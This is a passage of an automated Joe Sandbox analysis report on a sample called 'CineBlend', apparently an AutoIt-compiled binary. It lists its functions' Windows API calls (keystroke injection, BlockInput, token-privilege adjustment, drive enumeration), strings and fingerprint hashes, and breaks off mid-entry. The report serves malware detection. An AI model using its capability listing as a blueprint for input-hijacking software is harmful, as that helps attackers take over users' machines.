GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00BC52EE,?,?,00000035,?), ref: 00BB4229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00BC52EE,?,?,00000035,?), ref: 00BB4239

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 5ff3e30eb86f5ff5a155e805d00e6ed1a3a1cd645c06b9477e8fc82628db6ffe
Instruction ID: a491c88ab17b70ec024ffe010fe26b7b0def1e989a7a955e37577e345ecf1883
Opcode Fuzzy Hash: 5ff3e30eb86f5ff5a155e805d00e6ed1a3a1cd645c06b9477e8fc82628db6ffe
Instruction Fuzzy Hash: 4BF0A0306002286AE7202A66AC4DFEBB6ADEF85761F0001A6B505D3181DA609A00D6B1

Function 00BABBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00BABC24
keybd_event.USER32(?,753DC0D0,?,00000000), ref: 00BABC37

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 336ea0ea3955218fa6538c4d8919edd2c45687df4934cf30c7045a5bb82a6988
Instruction ID: 24001e9021c830b03dc0276ff1cccd3d1a3767dbc9355e4fc8331f0ed0028579
Opcode Fuzzy Hash: 336ea0ea3955218fa6538c4d8919edd2c45687df4934cf30c7045a5bb82a6988
Instruction Fuzzy Hash: 44F0907180424DABDB019FA4C815BFEBFB0FF04319F00804AF961A6192D779C611DF94

Function 00BA1A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA1B48), ref: 00BA1A20
CloseHandle.KERNEL32(?,?,00BA1B48), ref: 00BA1A35

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 6dd5953be5888f3206586d13e7320a36d47964119daca0129d7a0b7e8c07fb6c
Instruction ID: 6131046e7c803770f1193c6d8e6703a43835f40299d4cce649cd001a0b6622f5
Opcode Fuzzy Hash: 6dd5953be5888f3206586d13e7320a36d47964119daca0129d7a0b7e8c07fb6c
Instruction Fuzzy Hash: FBE04F72019610AFE7252B11FC05F73B7EDEB05320F14885EF4A681470EB726C90DB14

Function 00BBF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00BBF51A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 20e1d6482613e183349086fd5a388138ed4e6c0af25b0ed299e2ef4100bbd403
Instruction ID: 4239cca86c23e8e0828cca2fa799fda63622e662a59d250dd87d1586012bec9c
Opcode Fuzzy Hash: 20e1d6482613e183349086fd5a388138ed4e6c0af25b0ed299e2ef4100bbd403
Instruction Fuzzy Hash: 77E048312102055FC7109F69D8549A6F7D8EFA4761F048466F849C7351DAB0FA408BA0

Function 00BAEC9E Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00BAECC7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 78f7d4cbaa315e8aee16f8670ac7b2f91513b33dec036d4168e226e40a2546a8
Instruction ID: d803c597d203544b2e349d6f3f2019d6576be06d3e35aee1aaf50c132b54a95e
Opcode Fuzzy Hash: 78f7d4cbaa315e8aee16f8670ac7b2f91513b33dec036d4168e226e40a2546a8
Instruction Fuzzy Hash: 44D05EB619C20038E81D1B389E6FB762689E703761F8806CAB222C96D8F5D5E980A025

Function 00B60D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00B6075E), ref: 00B60D4A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 25d7a3cdeaee8fc4a0e5d3c03e596184edd02dfde2eb8aa10a36a3a6024eb5dc
Instruction ID: 735093d440fe01af9d09012c9f54ee2ff413fc02e453f7acc385cbb8a78dbcf4
Opcode Fuzzy Hash: 25d7a3cdeaee8fc4a0e5d3c03e596184edd02dfde2eb8aa10a36a3a6024eb5dc
Instruction Fuzzy Hash:

Function 00BC353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00BC358D
DeleteObject.GDI32(00000000), ref: 00BC35A0
DestroyWindow.USER32 ref: 00BC35AF
GetDesktopWindow.USER32 ref: 00BC35CA
GetWindowRect.USER32(00000000), ref: 00BC35D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00BC3700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00BC370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC3755
GetClientRect.USER32(00000000,?), ref: 00BC3761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BC379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC37BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC37D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC37DD
GlobalLock.KERNEL32(00000000), ref: 00BC37E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC37F5
GlobalUnlock.KERNEL32(00000000), ref: 00BC37FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC3805
GlobalFree.KERNEL32(00000000), ref: 00BC3810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC3822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00BE0C04,00000000), ref: 00BC3838
GlobalFree.KERNEL32(00000000), ref: 00BC3848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00BC386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00BC388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC38AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC3A9C

Strings

DISPLAY, xrefs: 00BC38FF
static, xrefs: 00BC3797, 00BC38EE
AutoIt v3, xrefs: 00BC374F
, xrefs: 00BC3A22

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: d7a663cb51ae1eb35e0a6de22ec3ee1465c4162f521956b3ad28aa9b45861d35
Instruction ID: b7f9302a042d82ae77d3ab8a0a715d2cbce03db015e91b2d84049d7bdba4b9f5
Opcode Fuzzy Hash: d7a663cb51ae1eb35e0a6de22ec3ee1465c4162f521956b3ad28aa9b45861d35
Instruction Fuzzy Hash: 2F026C71900205AFDB14DF64CC99FAEBBF9EB49710F048199F955AB2A0DB74EE01CB60

Function 00BD7B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00BD7B67
GetSysColorBrush.USER32(0000000F), ref: 00BD7B98
GetSysColor.USER32(0000000F), ref: 00BD7BA4
SetBkColor.GDI32(?,000000FF), ref: 00BD7BBE
SelectObject.GDI32(?,?), ref: 00BD7BCD
InflateRect.USER32(?,000000FF,000000FF), ref: 00BD7BF8
GetSysColor.USER32(00000010), ref: 00BD7C00
CreateSolidBrush.GDI32(00000000), ref: 00BD7C07
FrameRect.USER32(?,?,00000000), ref: 00BD7C16
DeleteObject.GDI32(00000000), ref: 00BD7C1D
InflateRect.USER32(?,000000FE,000000FE), ref: 00BD7C68
FillRect.USER32(?,?,?), ref: 00BD7C9A
GetWindowLongW.USER32(?,000000F0), ref: 00BD7CBC

Part of subcall function 00BD7E22: GetSysColor.USER32(00000012), ref: 00BD7E5B
Part of subcall function 00BD7E22: SetTextColor.GDI32(?,00BD7B2D), ref: 00BD7E5F
Part of subcall function 00BD7E22: GetSysColorBrush.USER32(0000000F), ref: 00BD7E75
Part of subcall function 00BD7E22: GetSysColor.USER32(0000000F), ref: 00BD7E80
Part of subcall function 00BD7E22: GetSysColor.USER32(00000011), ref: 00BD7E9D
Part of subcall function 00BD7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BD7EAB
Part of subcall function 00BD7E22: SelectObject.GDI32(?,00000000), ref: 00BD7EBC
Part of subcall function 00BD7E22: SetBkColor.GDI32(?,?), ref: 00BD7EC5
Part of subcall function 00BD7E22: SelectObject.GDI32(?,?), ref: 00BD7ED2
Part of subcall function 00BD7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00BD7EF1
Part of subcall function 00BD7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BD7F08
Part of subcall function 00BD7E22: GetWindowLongW.USER32(?,000000F0), ref: 00BD7F15

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: aade66d2ba50d75a26cf0962c6df615dcface17fb58b82677208caa375aa50bb
Instruction ID: 1bebfffde1437b269b25fa9cce5eda2248c93377b9f436bb396e8eb2d963520f
Opcode Fuzzy Hash: aade66d2ba50d75a26cf0962c6df615dcface17fb58b82677208caa375aa50bb
Instruction Fuzzy Hash: 21A17D71049301AFC7119F64DC58AABFBE9FB48324F140A5AF9A2A71A0FB71D944CB91

Function 00B41625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00B416B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00B82B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B82B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B82F85

Part of subcall function 00B41802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B41488,?,00000000,?,?,?,?,00B4145A,00000000,?), ref: 00B41865

SendMessageW.USER32(?,00001053), ref: 00B82FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B82FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00B82FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00B82FF9

Strings

0, xrefs: 00B82E11

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: d3b29f7bd93694cc97c655d6ad7224386bc02b8d816f3aab53861bf6eea8a476
Instruction ID: 37985823f6e71043565af1343ec328869b0e2aa343760ee9b7e74269e541089d
Opcode Fuzzy Hash: d3b29f7bd93694cc97c655d6ad7224386bc02b8d816f3aab53861bf6eea8a476
Instruction Fuzzy Hash: 7512CC34601211EFDB25EF18C894BA9BBE5FB45300F1885AAF4859B271CB31ED92DF91

Function 00BC316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00BC319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BC32C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00BC3306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00BC3316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00BC335D
GetClientRect.USER32(00000000,?), ref: 00BC3369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00BC33B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BC33C1
GetStockObject.GDI32(00000011), ref: 00BC33D1
SelectObject.GDI32(00000000,00000000), ref: 00BC33D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00BC33E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC33EE
DeleteDC.GDI32(00000000), ref: 00BC33F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BC3423
SendMessageW.USER32(00000030,00000000,00000001), ref: 00BC343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00BC347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BC348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 00BC349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00BC34D4
GetStockObject.GDI32(00000011), ref: 00BC34DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BC34EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00BC34F4

Strings

DISPLAY, xrefs: 00BC33B7
static, xrefs: 00BC33AC, 00BC34CE
AutoIt v3, xrefs: 00BC3355
msctls_progress32, xrefs: 00BC3470

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: fe8b2ac954f50089f5c8f82c19b502f3bdd783ceb6aed3d7e1d3346a672ae42e
Instruction ID: ce2bb4e6d4ac40f81a369804b0f6f0bf7bcc0f9aa5c907ad5ec59104ebf0d333
Opcode Fuzzy Hash: fe8b2ac954f50089f5c8f82c19b502f3bdd783ceb6aed3d7e1d3346a672ae42e
Instruction Fuzzy Hash: FDB15E75A40215AFDB14DFA8CC45FAEBBF9EB08710F408159F955EB2A0DB74AE00CB94

Function 00BB5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00BB5532
GetDriveTypeW.KERNEL32(?,00BDDC30,?,\\.\,00BDDCD0), ref: 00BB560F
SetErrorMode.KERNEL32(00000000,00BDDC30,?,\\.\,00BDDCD0), ref: 00BB577B

Strings

Removable, xrefs: 00BB5655, 00BB565A
FileBackedVirtual, xrefs: 00BB5731
RAID, xrefs: 00BB5700
\\.\, xrefs: 00BB5584
SAS, xrefs: 00BB570E
1394, xrefs: 00BB56E4
RAMDisk, xrefs: 00BB5639
USB, xrefs: 00BB56F9
SSA, xrefs: 00BB56EB
PhysicalDrive, xrefs: 00BB55BB
iSCSI, xrefs: 00BB5707
Fibre, xrefs: 00BB56F2
Virtual, xrefs: 00BB572A
SSD, xrefs: 00BB568F
Unknown, xrefs: 00BB5632, 00BB56C8
MMC, xrefs: 00BB5723
Network, xrefs: 00BB5647
SATA, xrefs: 00BB5715
ATA, xrefs: 00BB56DD
Fixed, xrefs: 00BB564E
SCSI, xrefs: 00BB56CF
ATAPI, xrefs: 00BB56D6
CDROM, xrefs: 00BB5640

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: fea1839beba7a73d050ec7425eaca0a2c32afa5e4747bf4a8b371996e57920a4
Instruction ID: 303ceb0064f786ce8ad98b01ee12fed7eb742ba5f4a39af9356c370011441b4c
Opcode Fuzzy Hash: fea1839beba7a73d050ec7425eaca0a2c32afa5e4747bf4a8b371996e57920a4
Instruction Fuzzy Hash: 7F619230B48A05DBCB38DF25C991AF977E1EF14350B2481E6E406AB291DAB1ED43DB53

Function 00BD1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BD1BC4
GetDesktopWindow.USER32 ref: 00BD1BD9
GetWindowRect.USER32(00000000), ref: 00BD1BE0
GetWindowLongW.USER32(?,000000F0), ref: 00BD1C35
DestroyWindow.USER32(?), ref: 00BD1C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BD1C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BD1CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BD1CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00BD1CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00BD1CE1
IsWindowVisible.USER32(00000000), ref: 00BD1D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00BD1D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00BD1D6C
GetWindowRect.USER32(00000000,?), ref: 00BD1D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00BD1DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00BD1DC4
CopyRect.USER32(?,?), ref: 00BD1DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00BD1E46

Strings

tooltips_class32, xrefs: 00BD1C82
0, xrefs: 00BD1B6F
(, xrefs: 00BD1DB7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: fe3ba9450399fe9e8c15e800c16273feb8ed8ba7546eb266411f1bf4e6b0b9c3
Instruction ID: 6b7d11f483fff6491b4e24a756713272d8395509de83427328c8941cd14f9b5e
Opcode Fuzzy Hash: fe3ba9450399fe9e8c15e800c16273feb8ed8ba7546eb266411f1bf4e6b0b9c3
Instruction Fuzzy Hash: 6BB18071605301AFD714DF68C884B5AFBE5FF84310F04899EF9999B291EB31D844CB91

Function 00BD0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00BD0D81
_wcslen.LIBCMT ref: 00BD0DBB
_wcslen.LIBCMT ref: 00BD0E25
_wcslen.LIBCMT ref: 00BD0E8D
_wcslen.LIBCMT ref: 00BD0F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BD0F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BD0FA0

Part of subcall function 00B5FD52: _wcslen.LIBCMT ref: 00B5FD5D

Part of subcall function 00BA2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BA2BA5
Part of subcall function 00BA2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA2BD7

Strings

GETSELECTEDCOUNT, xrefs: 00BD0F0C, 00BD0F27
VIEWCHANGE, xrefs: 00BD1111
SELECT, xrefs: 00BD0FE4
SELECTINVERT, xrefs: 00BD101A
GETITEMCOUNT, xrefs: 00BD0DB2, 00BD0DD3
SELECTALL, xrefs: 00BD0FB1
SELECTCLEAR, xrefs: 00BD0FC9
FINDITEM, xrefs: 00BD10C3
GETTEXT, xrefs: 00BD0E88, 00BD0EA3
ISSELECTED, xrefs: 00BD0F79
GETSELECTED, xrefs: 00BD107D
GETSUBITEMCOUNT, xrefs: 00BD0E20, 00BD0E3B
DESELECT, xrefs: 00BD1038

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
